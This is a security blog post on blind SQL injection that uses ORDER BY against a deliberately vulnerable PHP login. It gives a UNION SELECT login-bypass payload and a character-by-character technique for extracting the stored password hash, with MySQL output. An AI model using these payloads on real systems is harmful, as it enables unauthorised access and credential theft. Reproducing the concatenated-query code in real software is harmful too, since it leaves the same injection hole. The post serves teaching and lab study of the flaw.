Blind SQL injection using ORDER BY


    0x01 Scenario

    Login code:

    $username = $_POST['username'];
    $password = $_POST['password'];
    if(filter($username)){
        // filters parentheses
    }else{
        $sql="SELECT * FROM admin WHERE username='".$username."'";
        $result=mysql_query($sql);
        @$row = mysql_fetch_array($result);
        if(isset($row) && $row['username'] === 'admin'){
            if ($row['password']===md5($password)){
                //Login successful
            }else{
                die("password error!");
            }
        }else{
            die("username does not exist!");
        }
    }

    With the following table:

    mysql> select * from admin where username='admin';
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
    +----+----------+----------------------------------+
    1 row in set (0.00 sec)

    A common scenario: when a user logs in, a wrong username yields the message "username does not exist", while a correct username with a wrong password yields "password error".

    0x02 Logging in with UNION SELECT

    Seeing this logic, the first idea is naturally to forge a password row with UNION SELECT and log in directly:

    username=' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b&password=1
    
    mysql> select * from admin where username='' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b';
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    |  1 | admin    | c4ca4238a0b923820dcc509a6f75849b |
    +----+----------+----------------------------------+
    1 row in set (0.00 sec)

    But what if we want to obtain the password itself?

    0x03 Taking off with ORDER BY

    The login messages give us a boolean condition; how can ORDER BY make use of it? Sorting on the password column places the forged row before or after the real admin row depending on how the guessed string compares with the stored hash, so the first row returned (the only one the code inspects) is either the fake row or the admin row, and the error message reveals which:

    mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3;
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    |  1 | 2        | 5                                |
    |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
    +----+----------+----------------------------------+
    2 rows in set (0.00 sec)
    
    mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3;
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
    |  1 | 2        | 6                                |
    +----+----------+----------------------------------+
    2 rows in set (0.01 sec)
    
    mysql> select * from admin where username='' or 1 union select 1,2,'51' order by 3;
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    |  1 | 2        | 51                               |
    |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
    +----+----------+----------------------------------+
    2 rows in set (0.00 sec)
    
    mysql> select * from admin where username='' or 1 union select 1,2,'52' order by 3;
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
    |  1 | 2        | 52                               |
    +----+----------+----------------------------------+
    2 rows in set (0.00 sec)

    By testing one character at a time, the password can be recovered.

    Obviously this method is rarely used in practice, but it may be needed in specific environments, such as lab setups: if parentheses are filtered, other blind injection techniques are essentially useless, and ORDER BY can be used for the injection instead.

    Copyright belongs to the author.
    Commercial reposting requires the author's permission; non-commercial reposting must credit the source.
    Author: p0
    Link: http://p0sec.net/index.php/archives/106/
    Source: http://p0sec.net/

  Original URL: https://www.cnblogs.com/xishaonian/p/7703486.html